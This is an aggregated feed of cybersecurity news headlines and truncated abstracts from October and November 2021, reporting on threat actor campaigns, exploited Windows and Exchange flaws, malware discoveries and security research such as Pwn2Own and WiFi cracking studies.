A new malware campaign has been discovered targeting cryptocurrency, non-fungible token ( NFT ), and DeFi aficionados through Discord channels to deploy a crypter named "Babadeda" that's capable of bypassing antivirus solutions and stage a variety of attacks. "[T]his malware installer has been used in a variety of recent campaigns to deliver information stealers, RATs, and even LockBit ransomware," Morphisec researchers said in a report published this week. The malware distribution attacks are said to have commenced in May 2021. Crypters are a type of software used by cybercriminals that can encrypt, obfuscate, and manipulate malicious code so as to appear seemingly innocuous and make it harder to detect by security programs — a holy grail for malware authors. The infiltrations observed by Morphisec involved the threat actor sending decoy messages to prospective users on Discord channels related to blockchain-based games such as Mines of Dalarnia , urgThe Hacker News
November 25, 2021
Hackers Using Microsoft MSHTML Flaw to Spy on Targeted PCs with Malware Full Text
Abstract
A new Iranian threat actor has been discovered exploiting a now-addressed critical flaw in the Microsoft Windows MSHTML platform to target Farsi-speaking victims with a new PowerShell-based information stealer designed to harvest extensive details from infected machines. "[T]he stealer is a PowerShell script, short with powerful collection capabilities — in only ~150 lines, it provides the adversary a lot of critical information including screen captures, Telegram files, document collection, and extensive data about the victim's environment," SafeBreach Labs researcher Tomer Bar said in a report published Wednesday. Nearly half of the targets are from the U.S., with the cybersecurity firm noting that the attacks are likely aimed at "Iranians who live abroad and might be seen as a threat to Iran's Islamic regime." The phishing campaign, which began in July 2021, involved the exploitation of CVE-2021-40444, a remote code execution flaw that could be expThe Hacker News
November 25, 2021
Iranian threat actors exploit MS MSHTML bug to steal Google and Instagram credentials Full Text
Abstract
An Iranian threat actor is stealing Google and Instagram credentials of Farsi-speaking targets by exploiting a Microsoft MSHTML bug. Researchers from SafeBreach Labs spotted a new Iranian threat actor that is using an exploit for a Microsoft MSHTML...Security Affairs
November 25, 2021
Warning — Hackers Exploiting New Windows Installer Zero-Day Exploit in the Wild Full Text
Abstract
Attackers are actively making efforts to exploit a new variant of a recently disclosed privilege escalation vulnerability to potentially execute arbitrary code on fully-patched systems, once again demonstrating how adversaries move quickly to weaponize a publicly available exploit. Cisco Talos disclosed that it "detected malware samples in the wild that are attempting to take advantage of this vulnerability." Tracked as CVE-2021-41379 and discovered by security researcher Abdelhamid Naceri, the elevation of privilege flaw affecting the Windows Installer software component was originally resolved as part of Microsoft's Patch Tuesday updates for November 2021. However, in what's a case of an insufficient patch, Naceri found that it was not only possible to bypass the fix implemented by Microsoft but also achieve local privilege escalation via a newly discovered zero-day bug. The proof-of-concept (PoC) exploit, dubbed " InstallerFileTakeOver ," wThe Hacker News
November 24, 2021
The Record by Recorded Future Full Text
Abstract
An Iranian threat actor discovered earlier this year is responsible for raids against U.S. targets designed to hoover up Gmail and Instagram credentials, according to research by SafeBreach.The Record
November 23, 2021
Threat actors find and compromise exposed services in 24 hours Full Text
Abstract
Researchers set up 320 honeypots to see how quickly threat actors would target exposed cloud services and report that 80% of them were compromised in under 24 hours.BleepingComputer
November 23, 2021
Hackers target biomanufacturing with stealthy Tardigrade malware Full Text
Abstract
An advanced hacking group is actively targeting biomanufacturing facilities with a new custom malware called 'Tardigrade.'BleepingComputer
November 22, 2021
Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns Full Text
Abstract
Threat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems. The findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a never-before-seen loader dubbed SQUIRRELWAFFLE. First publicly documented by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via laced Microsoft Office documents. "It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities," researchers Mohamed Fahmy, Sherif Magdy, Abdelrhman Sharshar said in a report published last week. "To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits." ProxyLoThe Hacker News
November 22, 2021
Ethical hackers and the economics of security research Full Text
Abstract
New findings from a Bugcrowd report indicate a startling shift in the threat landscape with 8 out of 10 ethical hackers recently having identified a vulnerability they had never seen before.Help Net Security
November 20, 2021
RedCurl Corporate Espionage Hackers Return With Updated Hacking Tools Full Text
Abstract
A corporate cyber-espionage hacker group has resurfaced after a seven-month hiatus with new intrusions targeting four companies this year, including one of the largest wholesale stores in Russia, while simultaneously making tactical improvements to its toolset in an attempt to thwart analysis. "In every attack, the threat actor demonstrates extensive red teaming skills and the ability to bypass traditional antivirus detection using their own custom malware," Group-IB's Ivan Pisarev said . Active since at least November 2018, the Russian-speaking RedCurl hacking group has been linked to 30 attacks to date with the goal of corporate cyber espionage and document theft aimed at 14 organizations spanning construction, finance, consulting, retail, insurance, and legal sectors and located in the U.K., Germany, Canada, Norway, Russia, and Ukraine. The threat actor uses an array of established hacking tools to infiltrate its targets and steal internal corporate documentatThe Hacker News
November 20, 2021
North Korean Hackers Found Behind a Range of Credential Theft Campaigns Full Text
Abstract
A threat actor with ties to North Korea has been linked to a prolific wave of credential theft campaigns targeting research, education, government, media and other organizations, with two of the attacks also attempting to distribute malware that could be used for intelligence gathering. Enterprise security firm Proofpoint attributed the infiltrations to a group it tracks as TA406 , and by the wider threat intelligence community under the monikers Kimsuky ( Kaspersky ), Velvet Chollima ( CrowdStrike ), Thallium ( Microsoft ), Black Banshee ( PwC ), ITG16 ( IBM ), and the Konni Group ( Cisco Talos ). Policy experts, journalists and nongovernmental organizations (NGOs) were targeted as part of weekly campaigns observed between from January through June 2021, Proofpoint researchers Darien Huss and Selena Larson disclosed in a technical report detailing the actor's tactics, techniques, and procedures (TTPs), with the attacks spread across North America, Russia, China, and SouthThe Hacker News
November 20, 2021
Microsoft Reports Evolution of Iranian Hacking Groups Full Text
Abstract
From September 2020, the tech giant has been tracking six Iranian hacking groups (DEV-0146, DEV-0227, DEV-0198, DEV-0500, Rubidium, and Phosphorus) spreading ransomware and stealing data.Cyware Alerts - Hacker News
November 20, 2021
The Glitch Platform Is Being Used By Hackers to Host Malicious URLs Full Text
Abstract
The Glitch platform has become a target for phishing hackers. It seems that the service is being actively abused by cybercriminals with the goal to host on this platform for free phishing sites that perform credentials theft.Heimdal Security
November 20, 2021
North Korean Hacker Group Intensifies Espionage Campaigns Full Text
Abstract
The adversary, which security researchers also refer to as Kimsuky, Thallium, and Konni, has been targeting organizations in sectors such as education, government, media, and research, as well as other industries.Security Week
November 19, 2021
North Korea-linked TA406 cyberespionage group activity in 2021 Full Text
Abstract
North Korea-linked TA406 APT group has intensified its attacks in 2021, particularly credential harvesting campaigns. A report published by Proofpoint revealed that the North Korea-linked TA406 APT group (Kimsuky, Thallium, and Konni, Black Banshee, Velvet...Security Affairs
November 18, 2021
Hundreds participate in electric grid cyberattack simulation amid increasing threats Full Text
Abstract
More than 700 individuals associated with the bulk power grid and other related critical infrastructure participated in a simulation this week designed to test resilience against a major physical and cyberattack.The Hill
November 18, 2021
Microsoft: Iranian state hackers increasingly target IT sector Full Text
Abstract
Microsoft says Iranian-backed hacking groups have increasingly attempted to compromise IT services companies this year to steal credentials they could use to breach the systems of downstream clients.BleepingComputer
November 18, 2021
North Korean Threat Group Targets Foreign Policy Experts, Journalists, and NGOs Full Text
Abstract
From January through June 2021, Proofpoint observed almost weekly campaigns by TA406 targeting foreign policy experts, journalists, and nongovernmental organizations (NGOs).Proof Point
November 18, 2021
RedCurl corporate espionage hackers resume attacks with updated tools Full Text
Abstract
A crew of highly-skilled hackers specialized in corporate espionage has resumed activity, one of their victims this year being a large wholesale company in Russia.BleepingComputer
November 17, 2021
Microsoft Warns about 6 Iranian Hacking Groups Turning to Ransomware Full Text
Abstract
Nation-state operators with nexus to Iran are increasingly turning to ransomware as a means of generating revenue and intentionally sabotaging their targets, while also engaging in patient and persistent social engineering campaigns and aggressive brute force attacks. No less than six threat actors affiliated with the West Asian country have been discovered deploying ransomware to achieve their strategic objectives, researchers from Microsoft Threat Intelligence Center (MSTIC) revealed , adding "these ransomware deployments were launched in waves every six to eight weeks on average." Of note is a threat actor tracked as Phosphorus (aka Charming Kitten or APT35), which has been found scanning IP addresses on the internet for unpatched Fortinet FortiOS SSL VPN and on-premises Exchange Servers to gain initial access and persistence on vulnerable networks, before moving to deploy additional payloads that enable the actors to pivot to other machines and deploy ransomware.The Hacker News
November 17, 2021
U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws Full Text
Abstract
Cybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday released a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware. The threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC). The agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critiThe Hacker News
November 17, 2021
Hackers Targeting Myanmar Use Domain Fronting to Hide Malicious Activities Full Text
Abstract
A malicious campaign has been found leveraging a technique called domain fronting to hide command-and-control traffic by leveraging a legitimate domain owned by the Myanmar government to route communications to an attacker-controlled server with the goal of evading detection. The threat, which was observed in September 2021, deployed Cobalt Strike payloads as a stepping stone for launching further attacks, with the adversary using a domain associated with the Myanmar Digital News network, a state-owned digital newspaper, as a front for their Beacons. "When the Beacon is launched, it will submit a DNS request for a legitimate high-reputation domain hosted behind Cloudflare infrastructure and modify the subsequent HTTPs requests header to instruct the CDN to direct the traffic to an attacker-controlled host," Cisco Talos researchers Chetan Raghuprasad, Vanja Svajcer, and Asheer Malhotra said in a technical analysis published Tuesday. Originally released in 2012 to addresThe Hacker News
November 17, 2021
Threat actors offer millions for zero-days, developers talk of exploit-as-a-service Full Text
Abstract
While mostly hidden in private conversations, details sometimes emerge about the parallel economy of vulnerability exploits on underground forums, revealing just how fat of a wallet some threat actors have.BleepingComputer
November 16, 2021
Facebook disrupts Pakistani hacking group targeting Afghan users Full Text
Abstract
Facebook on Tuesday said it had taken steps to disrupt a group of hackers based in Pakistan that had been using the platform to target former members of the Afghan government and others based in Afghanistan amid the government collapse earlier this year.The Hill
November 16, 2021
Microsoft warns of the evolution of six Iranian hacking groups Full Text
Abstract
The Microsoft Threat Intelligence Center (MSTIC) has presented an analysis of the evolution of several Iranian threat actors at the CyberWarCon 2021, and their findings show increasingly sophisticated attacks.BleepingComputer
November 16, 2021
How Attackers Exploit the Remote Desktop Protocol Full Text
Abstract
The Remote Desktop Protocol (RDP) is one of the most popular communication protocols for remotely controlling systems. It didn’t take long before attackers realized this is a golden egg.Security Intelligence
November 15, 2021
New ‘Moses Staff’ Hacker Group Targets Israeli Companies With Destructive Attacks Full Text
Abstract
A new politically-motivated hacker group named " Moses Staff " has been linked to a wave of targeted attacks targeting Israeli organizations since September 2021 with the goal of plundering and leaking sensitive information prior to encrypting their networks, with no option to regain access or negotiate a ransom. "The group openly states that their motivation in attacking Israeli companies is to cause damage by leaking the stolen sensitive data and encrypting the victim's networks, with no ransom demand," Check Point Research said in a report published Monday. "In the language of the attackers, their purpose is to 'Fight against the resistance and expose the crimes of the Zionists in the occupied territories.'" At least 16 victims have had their data leaked to date, according to stats released by the collective. The threat actor is said to leverage publicly known vulnerabilities as a means to breach enterprise servers and gain initial acThe Hacker News
November 15, 2021
Researchers Demonstrate New Fingerprinting Attack on Tor Encrypted Traffic Full Text
Abstract
A new analysis of website fingerprinting (WF) attacks aimed at the Tor web browser has revealed that it's possible for an adversary to glean a website frequented by a victim, but only in scenarios where the threat actor is interested in a specific subset of the websites visited by users. "While attacks can exceed 95% accuracy when monitoring a small set of five popular websites, indiscriminate (non-targeted) attacks against sets of 25 and 100 websites fail to exceed an accuracy of 80% and 60%, respectively," researchers Giovanni Cherubin, Rob Jansen, and Carmela Troncoso said in a newly published paper. Tor browser offers "unlinkable communication" to its users by routing internet traffic through an overlay network, consisting of more than six thousand relays, with the goal of anonymizing the originating location and usage from third parties conducting network surveillance or traffic analysis. It achieves this by building a circuit that traverses via anThe Hacker News
November 15, 2021
North Korean Hackers Target Cybersecurity Researchers with Trojanized IDA Pro Full Text
Abstract
Lazarus, the North Korea-affiliated state-sponsored group, is attempting to once again target security researchers with backdoors and remote access trojans using a trojanized pirated version of the popular IDA Pro reverse engineering software. The findings were reported by ESET security researcher Anton Cherepanov last week in a series of tweets. IDA Pro is an Interactive Disassembler that's designed to translate machine language (aka executables) into assembly language, enabling security researchers to analyze the inner workings of a program (malicious or otherwise) as well as function as a debugger to detect errors. "Attackers bundled the original IDA Pro 7.5 software developed by [Hex-Rays] with two malicious components," the Slovak cybersecurity firm said, one of which is an internal module called "win_fw.dll" that's executed during installation of the application. This tampered version is then orchestrated to load a second component named "The Hacker News
November 15, 2021
Hackers are Exploiting Zero-Day Flaw in macOS: Google Warns Full Text
Abstract
Google observed that hackers were using a watering hole attack. In this attack, the websites targeted are typically selected by the attackers based on the profile of their visitors.Cyware Alerts - Hacker News
November 15, 2021
North Korea-linked Lazarus group targets cybersecurity experts with Trojanized IDA Pro Full Text
Abstract
North Korea-linked APT Lazarus targets security researchers using a trojanized pirated version of the popular IDA Pro reverse engineering software. ESET researchers reported that the North Korea-linked Lazarus APT group is targeting cyber security...Security Affairs
November 12, 2021
Hackers Increasingly Using HTML Smuggling in Malware and Phishing Attacks Full Text
Abstract
Threat actors are increasingly banking on the technique of HTML smuggling in phishing campaigns as a means to gain initial access and deploy an array of threats, including banking malware, remote administration trojans (RATs), and ransomware payloads. Microsoft 365 Defender Threat Intelligence Team, in a new report published Thursday, disclosed that it identified infiltrations distributing the Mekotio banking Trojan, backdoors such as AsyncRAT and NjRAT , and the infamous TrickBot malware. The multi-staged attacks — dubbed ISOMorph — were also publicly documented by Menlo Security in July 2021. HTML smuggling is an approach that allows an attacker to "smuggle" first-stage droppers, often encoded malicious scripts embedded within specially-crafted HTML attachment or web pages, on a victim machine by taking advantage of basic features in HTML5 and JavaScript rather than exploiting a vulnerability or a design flaw in modern web browsers. By doing so, it enables tThe Hacker News
November 12, 2021
These are the top-level domains threat actors like the most Full Text
Abstract
Out of over a thousand top-level domain choices, cyber-criminals and threat actors prefer a small set of 25, which accounts for 90% of all malicious sites.BleepingComputer
November 11, 2021
Hackers Exploit macOS Zero-Day to Hack Hong Kong Users with new Implant Full Text
Abstract
Google researchers on Thursday disclosed that it found a watering hole attack in late August exploiting a now-parched zero-day in macOS operating system and targeting Hong Kong websites related to a media outlet and a prominent pro-democracy labor and political group to deliver a never-before-seen backdoor on compromised machines. "Based on our findings, we believe this threat actor to be a well-resourced group, likely state backed, with access to their own software engineering team based on the quality of the payload code," Google Threat Analysis Group (TAG) researcher Erye Hernandez said in a report. Tracked as CVE-2021-30869 (CVSS score: 7.8), the security shortcoming concerns a type confusion vulnerability affecting the XNU kernel component that could cause a malicious application to execute arbitrary code with the highest privileges. Apple addressed the issue on September 23. The attacks observed by TAG involved an exploit chain that strung together CVE-2021The Hacker News
November 11, 2021
Three Threat Groups Found Interconnected to a Common Broker Full Text
Abstract
BlackBerry discovered that actors behind MountLocker, Phobos, and the StrongPity APT are dependent on a common initial access broker, dubbed Zebra2104, for their malware campaigns. The broker has helped criminals break into the networks of multiple firms in Australia and Turkey. Such collabo ... Read MoreCyware Alerts - Hacker News
November 11, 2021
Researchers Uncover Hacker-for-Hire Group That’s Active Since 2015 Full Text
Abstract
A new cyber mercenary hacker-for-hire group dubbed " Void Balaur " has been linked to a string of cyberespionage and data theft activities targeting thousands of entities as well as human rights activists, politicians, and government officials around the world at least since 2015 for financial gain while lurking in the shadows. Named after a many-headed dragon from Romanian folklore, the adversary has been unmasked advertising its services in Russian-speaking underground forums dating all the way back to 2017 and selling troves of sensitive information such as cell tower phone logs, passenger flight records, credit reports, banking data, SMS messages, and passport details. The threat actor calls itself "Rockethack." "This hacker-for-hire group does not operate out of a physical building, nor does it have a shiny prospectus that describes its services," Trend Micro researcher Feike Hacquebord said in a newly published profile of the collective. &quThe Hacker News
November 11, 2021
Hackers undetected on Queensland water supplier server for 9 months Full Text
Abstract
Hackers stayed hidden for nine months on a server holding customer information for a Queensland water supplier, illustrating the need of better cyberdefenses for critical infrastructure.BleepingComputer
November 11, 2021
Iran’s Lyceum Hackers Target Telecoms, ISPs in Israel, Saudi Arabia, and Africa Full Text
Abstract
A state-sponsored threat actor allegedly affiliated with Iran has been linked to a series of targeted attacks aimed at internet service providers (ISPs) and telecommunication operators in Israel, Morocco, Tunisia, and Saudi Arabia, as well as a ministry of foreign affairs (MFA) in Africa, new findings reveal. The intrusions, staged by a group tracked as Lyceum, are believed to have occurred between July and October 2021, researchers from Accenture Cyber Threat Intelligence (ACTI) group and Prevailion's Adversarial Counterintelligence Team (PACT) said in a technical report. The names of the victims were not disclosed. The latest revelations throw light on the web-based infrastructure used by Lyceum, over 20 of them, enabling the identification of "additional victims and provide further visibility into Lyceum's targeting methodology," the researchers noted , adding "at least two of the identified compromises are assessed to be ongoing despite prior public disclThe Hacker News
November 11, 2021
TeamTNT Uses New Sophisticated Techniques Against Docker Systems Full Text
Abstract
The TeamTNT group has upped its game in recent times. Recently, it was found targeting Docker servers exposing Docker REST APIs for cryptomining purposes, under the campaign that was set off in October. Experts surmise that the threat actor could launch a larger-scale attack in the near future.Cyware Alerts - Hacker News
November 11, 2021
North Korean Hacker Group Uses Malicious Blogs to Deliver Malware to High-Profile Targets Full Text
Abstract
This campaign targets South Korea-based think tanks whose research focuses on political, diplomatic, and military topics pertaining to North Korea, China, Russia, and the U.S.Cisco Talos
November 10, 2021
Void Balaur hackers-for-hire sell stolen mailboxes and private data Full Text
Abstract
A hacker-for-hire group called Void Balaur has been stealing emails and highly-sensitive information for more than five years, selling it to customers with both financial and espionage goalsBleepingComputer
November 10, 2021
FBI warns of Iranian hackers looking to buy US orgs’ stolen data Full Text
Abstract
The Federal Bureau of Investigation (FBI) warned private industry partners of attempts by an Iranian threat actor to buy stolen information regarding US and worldwide organizations.BleepingComputer
November 10, 2021
Gamaredon Threat Group Allegedly Linked to Russia Full Text
Abstract
Ukraine agencies disclosed the details, including the real names, of the members of the Gamaredon group and linked its activities with Russia's FSB. According to the report, t he group allegedly carried out around 5,000 cyberattacks against Ukraine and attempted to target over 1,500 government ... Read MoreCyware Alerts - Hacker News
November 10, 2021
Lazarus hackers target researchers with trojanized IDA Pro Full Text
Abstract
A North Korean state-sponsored hacking group known as Lazarus is again trying to hack security researchers, this time with a trojanized pirated version of the popular IDA Pro reverse engineering application.BleepingComputer
November 10, 2021
Russian Hackers Hid Behind American Home Networks Full Text
Abstract
Residential proxies allowed the attackers to pass their internet traffic via a home user. This makes the traffic appear to have originated from a residential broadband customer in the U.S. instead of somewhere else, such as Eastern Europe.Cyware Alerts - Hacker News
November 10, 2021
TeamTNT group targets poorly configured Docker servers exposing REST APIs Full Text
Abstract
TeamTNT hackers are targeting poorly configured Docker servers as part of an ongoing campaign that started in October. Trend Micro researchers reported that TeamTNT hackers are targeting poorly configured Docker servers exposing Docker REST APIs as part...Security Affairs
November 09, 2021
TeamTNT hackers target your poorly configured Docker servers Full Text
Abstract
Poorly configured Docker servers and being actively targeted by the TeamTNT hacking group in an ongoing campaign started last month.BleepingComputer
November 9, 2021
New Threat Group Exploits Zoho Flaws in U.S Orgs Full Text
Abstract
Palo Alto Networks discovered that Emissary Panda, a hacking group with ties to China, is exploiting Zoho software flaws in the networks of at least nine organizations in the defense, energy, technology, healthcare, and education sectors. The attackers were using malicious tools for credentials ha ... Read MoreCyware Alerts - Hacker News
November 09, 2021
Iranian state hackers use upgraded malware in attacks on ISPs, telcos Full Text
Abstract
The Iranian state-supported APT known as 'Lyceum' (Hexane, Spilrin) targeted ISPs and telecommunication service providers in the Middle East and Africa between July and October 2021.BleepingComputer
November 9, 2021
Lyceum Threat Group Targeting Telecom Companies, ISPs in Israel, Morocco, Tunisia, and Saudi Arabia Full Text
Abstract
According to a new report, between July and October this year, Lyceum was spotted in attacks against ISPs and telecoms organizations across Israel, Morocco, Tunisia, and Saudi Arabia.ZDNet
November 8, 2021
Tortilla Gang Abusing ProxyShell Vulnerabilities to Spread Babuk Full Text
Abstract
Cisco Talos red-flagged a new campaign by Tortilla, one of Babuk’s affiliates, for targeting ProxyShell flaws in Exchange Server in an attempt to breach corporate networks. The gang asks for around $10,000 ransom in Monero to decrypt the encrypted documents. M ore similar attacks are expected in t ... Read MoreCyware Alerts - Hacker News
November 08, 2021
International coalition arrests hackers linked to thousands of ransomware attacks Full Text
Abstract
Romanian authorities have arrested two individuals they say are linked to the use of REvil ransomware as part of a prolific hacking group tied to attacks on several major American companies in recent months.The Hill
November 08, 2021
BlackBerry Uncovers Initial Access Broker Linked to 3 Distinct Hacker Groups Full Text
Abstract
A previously undocumented initial access broker has been unmasked as providing entry points to three different threat actors for mounting intrusions that range from financially motivated ransomware attacks to phishing campaigns. BlackBerry's research and intelligence team dubbed the entity " Zebra2104 ," with the group responsible for offering a means of a digital approach to ransomware syndicates such as MountLocker and Phobos, as well as the advanced persistent threat (APT) tracked under the moniker StrongPity (aka Promethium). The threat landscape as we know it has been increasingly dominated by a category of players known as the initial access brokers ( IABs ), who are known to provide other cyber-criminal groups, including ransomware affiliates, with a foothold to an infinite pool of potential organizations belonging to diverse geographies and sectors via persistent backdoors into the victim networks, effectively building a pricing model for remote access. &The Hacker News
November 8, 2021
Nation-state actors target critical sectors by exploiting the CVE-2021-40539 flaw Full Text
Abstract
Experts warn of an ongoing hacking campaign that already compromised at least nine organizations worldwide from critical sectors by exploiting CVE-2021-40539. Cybersecurity experts from Palo Alto Networks warn of an ongoing cyberespionage campaign...Security Affairs
November 6, 2021
White hat hackers earn over $1 Million at Pwn2Own Austin 2021 Full Text
Abstract
The Zero Day Initiative’s Pwn2Own Austin 2021 hacking contest has ended, and participants earned $1,081,250 for 61 zero-day flaws. Trend Micro's Zero Day Initiative’s Pwn2Own Austin 2021 hacking contest has ended, the participants earned a total...Security Affairs
November 05, 2021
Ukraine Identifies Russian FSB Officers Hacking As Gamaredon Group Full Text
Abstract
Ukraine's premier law enforcement and counterintelligence agency on Thursday disclosed the real identities of five individuals allegedly involved in cyberattacks attributed to a cyber-espionage group named Gamaredon , linking the members to Russia's Federal Security Service (FSB). Calling the hacker group "an FSB special project, which specifically targeted Ukraine," the Security Service of Ukraine (SSU) said the perpetrators "are officers of the 'Crimean' FSB and traitors who defected to the enemy during the occupation of the peninsula in 2014." The names of the five individuals the SSU alleges are part of the covert operation are Sklianko Oleksandr Mykolaiovych, Chernykh Mykola Serhiiovych, Starchenko Anton Oleksandrovych, Miroshnychenko Oleksandr Valeriiovych, and Sushchenko Oleh Oleksandrovych. Since its inception in 2013, the Russia-linked Gamaredon group (aka Primitive Bear, Armageddon, Winterflounder, or Iron Tilden) has been responsiThe Hacker News
November 05, 2021
Pwn2Own: Printer plays AC/DC, Samsung Galaxy S21 hacked twice Full Text
Abstract
Trend Micro's ZDI has awarded $1,081,250 for 61 zero-days exploited at Pwn2Own Austin 2021, with competitors successfully pwning the Samsung Galaxy S21 again and hacking an HP LaserJet printer to play AC/DC's Thunderstruck on the contest's third day.BleepingComputer
November 5, 2021
Threat actor exploits MS ProxyShell flaws to deploy Babuk ransomware Full Text
Abstract
Talos researchers warn of a new threat actor that is hacking Microsoft Exchange servers by exploiting ProxyShell flaws to gain access to corporate and deploy the Babuk Ransomware.Security Affairs
November 4, 2021
Hacker allegedly involved in 2020 Twitter hack charged with theft of $784K in crypto Full Text
Abstract
The US DoJ charged the suspected Twitter hacker 'PlugWalkJoe' with the theft of $784,000 worth of cryptocurrency using SIM swap attacks. The US Department of Justice has indicted Joseph James O'Connor, a suspected Twitter hacker also known as 'PlugWalkJoe,'...Security Affairs
November 04, 2021
Ukraine links members of Gamaredon hacker group to Russian FSB Full Text
Abstract
SSU and the Ukrainian secret service say they have identified five members of the Gamaredon hacking group, a Russian state-sponsored operation known for targeting Ukraine since 2014.BleepingComputer
November 3, 2021
Attackers Exploiting Google Chrome on Windows 10 for UAC Bypass Full Text
Abstract
Rapid7 unearthed a malicious campaign targeting Windows 10 running on Chrome browsers. The objective of the campaign is to obtain sensitive data and steal cryptocurrency from the infected systems. Experts recommend avoiding visiting unknown sites and clicking on suspicious links.Cyware Alerts - Hacker News
November 03, 2021
Commerce Department blacklists four groups linked to cyber surveillance operations Full Text
Abstract
The Commerce Department on Wednesday added four organizations linked to cyber surveillance operations, including the Israeli company NSO Group, to its “entity list,” effectively blacklisting them.The Hill
November 03, 2021
Sonos, HP, and Canon devices hacked at Pwn2Own Austin 2021 Full Text
Abstract
During the first day of Pwn2Own Austin 2021, contestants won $362,500 after exploiting previously unknown security flaws to hack printers, routers, NAS devices, and speakers from Canon, HP, Western Digital, Cisco, Sonos, TP-Link, and NETGEAR.BleepingComputer
November 2, 2021
TA2722 Impersonates Philippine Government to Lure Victims Full Text
Abstract
Balikbayan Foxes, aka TA2722, a new highly sophisticated threat actor, found targeting organizations globally by impersonating the Philippines government and businesses. All the campaigns were found distributing Remcos or NanoCore RATs. Security professionals and organizations are recommended to tr ... Read MoreCyware Alerts - Hacker News
November 02, 2021
Google to Pay Hackers $31,337 for Exploiting Patched Linux Kernel Flaws Full Text
Abstract
Google on Monday announced that it will pay security researchers to find exploits using vulnerabilities, previously remediated or otherwise, over the next three months as part of a new bug bounty program to improve the security of the Linux kernel. To that end, the company is expected to issue rewards worth $31,337 for exploiting privilege escalation in a lab environment for each patched vulnerability, an amount that can climb up to $50,337 for working exploits that take advantage of zero-day flaws in the kernel and other undocumented attack techniques. Specifically, the program aims to uncover attacks that could be launched against Kubernetes-based infrastructure to defeat process isolation barriers (via NSJail) and break out of the sandbox to leak secret information. The program is expected to last until January 31, 2022. "It is important to note, that the easiest exploitation primitives are not available in our lab environment due to the hardening done on Container-OptiThe Hacker News
November 1, 2021
How to hack Wincor Cineo ATMs to bypass black-box attack protections and withdraw cash Full Text
Abstract
Researchers demonstrated how crooks could hack Diebold Nixdorf's Wincor Cineo ATMs to bypass black-box attack protections and withdraw cash. Positive Technologies researchers Vladimir Kononovich and Alexey Stennikov have discovered security flaws...Security Affairs
November 1, 2021
Balikbayan Foxes group spoofs Philippine gov to spread RATs Full Text
Abstract
Meet Balikbayan Foxes: a threat group impersonating the Philippine gov't Experts uncovered a new threat actor, tracked as Balikbayan Foxes, that is impersonating the Philippine government to spread malware. Researchers from Proofpoint have uncovered...Security Affairs
October 28, 2021
Israeli Researcher Cracked Over 3500 Wi-Fi Networks in Tel Aviv City Full Text
Abstract
Over 70% of Wi-Fi networks from a sample size of 5,000 were hacked with "relative ease" in the Israeli city of Tel Aviv, highlighting how unsecure Wi-Fi passwords can become a gateway for serious threats to individuals, small businesses, and enterprises alike. CyberArk security researcher Ido Hoorvitch, who used a Wi-Fi sniffing equipment costing about $50 to collect 5,000 network hashes for the study, said "the process of sniffing Wi-Fis and the subsequent cracking procedures was a very accessible undertaking in terms of equipment, costs and execution." The new Wi-Fi attack builds on previous findings by Jens "atom" Steube in 2018 that involves capturing what's called the PMKIDs associated with a client (aka SSID) in order to attempt a brute-force attack using password recovery tools like hashcat. PMKID is a unique key identifier used by the access point (AP) to keep track of the pre-shared key — i.e., pairwise master key aka PMK — being uThe Hacker News
October 28, 2021
Alleged Russian hacker extradited from South Korea to stand trial in US Full Text
Abstract
An alleged Russian hacker appeared in court for the first time Thursday to face allegations that he played a role in a transnational cybercrime organization after being extradited to the United States from South Korea.The Hill
October 27, 2021
TA551 Using Silver Red-Teaming Tool to Penetrate Networks Full Text
Abstract
TA551 has been found targeting victims by email thread hijacking using a red-teaming toolkit and adversary simulation framework called Sliver. Experts revealed that the attackers have been using this technique since October 20. The use of open-source pentest tools is becoming more popular ... Read MoreCyware Alerts - Hacker News
October 27, 2021
Attack the block – How a security researcher cracked 70% of urban WiFi networks in one hit Full Text
Abstract
A vulnerability, discovered by Hashcat’s lead developer Jens “atom” Steube, is at the heart of the attack. This bug can be exploited to retrieve PMKID hashes to crack network passwords.The Daily Swig
October 26, 2021
Gummy Browsers Attack Lets Hackers Spoof Your Digital Identity Full Text
Abstract
Researchers at Texas A&M University and the University of Florida discovered Gummy Browsers, a new fingerprint capturing and browser spoofing attack. This attack technique can be leveraged to bypass 2FA on auth systems. While security analysts and experts will work toward addressing such ... Read MoreCyware Alerts - Hacker News
October 26, 2021
Expert managed to crack 70% of a 5,000 WiFi network sample in Tel Aviv Full Text
Abstract
A researcher from the security firm CyberArk has managed to crack 70% of Tel Aviv’s Wifi Networks starting from a sample of 5,000 gathered WiFi. CyberArk security researcher Ido Hoorvitch demonstrated how it is possible to crack WiFi at scale by exploiting...Security Affairs
October 26, 2021
North Korean state hackers start targeting the IT supply chain Full Text
Abstract
North Korean-sponsored Lazarus hacking group has switched focus on new targets and was observed by Kaspersky security researchers expanding its supply chain attack capabilities.BleepingComputer
October 26, 2021
Researcher cracked 70% of WiFi networks sampled in Tel Aviv Full Text
Abstract
A researcher has managed to crack 70% of a 5,000 WiFi network sample in his hometown, Tel Aviv, to prove that home networks are severely unsecured and easy to hijack.BleepingComputer
October 25, 2021
Microsoft Warns of Continued Supply-Chain Attacks by the Nobelium Hacker Group Full Text
Abstract
